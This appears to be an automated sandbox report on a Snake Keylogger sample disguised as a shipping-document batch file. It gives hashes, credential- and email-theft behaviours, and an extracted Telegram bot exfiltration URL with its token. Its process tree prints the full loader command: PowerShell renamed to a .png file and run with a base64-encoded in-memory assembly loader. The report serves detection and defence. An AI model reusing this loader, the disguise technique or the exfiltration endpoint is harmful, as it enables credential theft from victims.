Analysis
-
max time kernel
143s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11-10-2023 12:41
Static task
static1
Behavioral task
behavioral1
Sample
AW87438991 Shipping Document of goods.bat
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
AW87438991 Shipping Document of goods.bat
Resource
win10v2004-20230915-en
General
-
Target
AW87438991 Shipping Document of goods.bat
-
Size
865KB
-
MD5
722f1c5eef20be0cc0c13609a32fbcf0
-
SHA1
95ea04e0671acf23dfb0a8937feedb193d8c1db9
-
SHA256
c6cd9239769abc6280231e68ea19720889e64068fb5a347629755be0c6e735ae
-
SHA512
76545545417f959ad191e1d55194354d4e941008943062d6b48c42c6b2cbfd7669b747601423e6f6a0a59ad45959f569c8b8c7a3115404567b8bfcc402d4dafe
-
SSDEEP
24576:TmsLDIDisDkpyOiisSniF83PQmM4pPx8fkr:asiXDklDQ83PVRRr
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot6553808600:AAEctl9z_ViEe1VbBXIi3Q8EzcyyXMP9F5g/sendMessage?chat_id=5086753017
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/972-27-0x000001ECC7850000-0x000001ECC7872000-memory.dmp family_snakekeylogger -
Executes dropped EXE 1 IoCs
Processes:
Mskestde.pngpid process 972 Mskestde.png -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Mskestde.pngdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Mskestde.png Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Mskestde.png Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Mskestde.png -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 13 checkip.dyndns.org -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
Mskestde.pngpid process 972 Mskestde.png 972 Mskestde.png 972 Mskestde.png 972 Mskestde.png -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Mskestde.pngdescription pid process Token: SeDebugPrivilege 972 Mskestde.png Token: SeDebugPrivilege 972 Mskestde.png -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2820 wrote to memory of 3896 2820 cmd.exe cmd.exe PID 2820 wrote to memory of 3896 2820 cmd.exe cmd.exe PID 3896 wrote to memory of 2804 3896 cmd.exe cmd.exe PID 3896 wrote to memory of 2804 3896 cmd.exe cmd.exe PID 3896 wrote to memory of 2876 3896 cmd.exe xcopy.exe PID 3896 wrote to memory of 2876 3896 cmd.exe xcopy.exe PID 3896 wrote to memory of 1452 3896 cmd.exe cmd.exe PID 3896 wrote to memory of 1452 3896 cmd.exe cmd.exe PID 3896 wrote to memory of 1800 3896 cmd.exe xcopy.exe PID 3896 wrote to memory of 1800 3896 cmd.exe xcopy.exe PID 3896 wrote to memory of 972 3896 cmd.exe Mskestde.png PID 3896 wrote to memory of 972 3896 cmd.exe Mskestde.png -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
Processes:
Mskestde.pngdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Mskestde.png -
outlook_win_path 1 IoCs
Processes:
Mskestde.pngdescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Mskestde.png
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\AW87438991 Shipping Document of goods.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\AW87438991 Shipping Document of goods.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:2804
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Mskestde.png3⤵PID:2876
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "3⤵PID:1452
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\AW87438991 Shipping Document of goods.bat" C:\Users\Admin\AppData\Local\Temp\Mskestde.png.bat3⤵PID:1800
-
C:\Users\Admin\AppData\Local\Temp\Mskestde.pngC:\Users\Admin\AppData\Local\Temp\Mskestde.png -win 1 -enc JABaAGMAZgBmAHAAaQB6AGUAawBzAG8AIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQAWABrAHQAeQBiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFoAYwBmAGYAcABpAHoAZQBrAHMAbwApADsAJABKAGQAbABvAHQAZQB4AG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFgAawB0AHkAYgAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHIAYgBnAHcAbgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABKAGQAbABvAHQAZQB4AG0ALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEMAcgBiAGcAdwBuAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApADsAJABDAHIAYgBnAHcAbgAuAEMAbABvAHMAZQAoACkAOwAkAEoAZABsAG8AdABlAHgAbQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFgAawB0AHkAYgAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABYAGsAdAB5AGIAKQA7ACAAJABMAG0AaABtAGgAZQBwAHQAdgBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAFgAawB0AHkAYgApADsAIAAkAFMAbQBnAGUAZABxAGYAZQBvAHAAcgAgAD0AIAAkAEwAbQBoAG0AaABlAHAAdAB2AGoALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABXAHEAbABwAGkAZgB6ACAAPQAgACQAUwBtAGcAZQBkAHEAZgBlAG8AcAByAC4ARwBlAHQATQBlAHQAaABvAGQAcwAoACkAWwAwAF0ALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAJABuAHUAbABsACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:972
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
865KB
MD5722f1c5eef20be0cc0c13609a32fbcf0
SHA195ea04e0671acf23dfb0a8937feedb193d8c1db9
SHA256c6cd9239769abc6280231e68ea19720889e64068fb5a347629755be0c6e735ae
SHA51276545545417f959ad191e1d55194354d4e941008943062d6b48c42c6b2cbfd7669b747601423e6f6a0a59ad45959f569c8b8c7a3115404567b8bfcc402d4dafe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82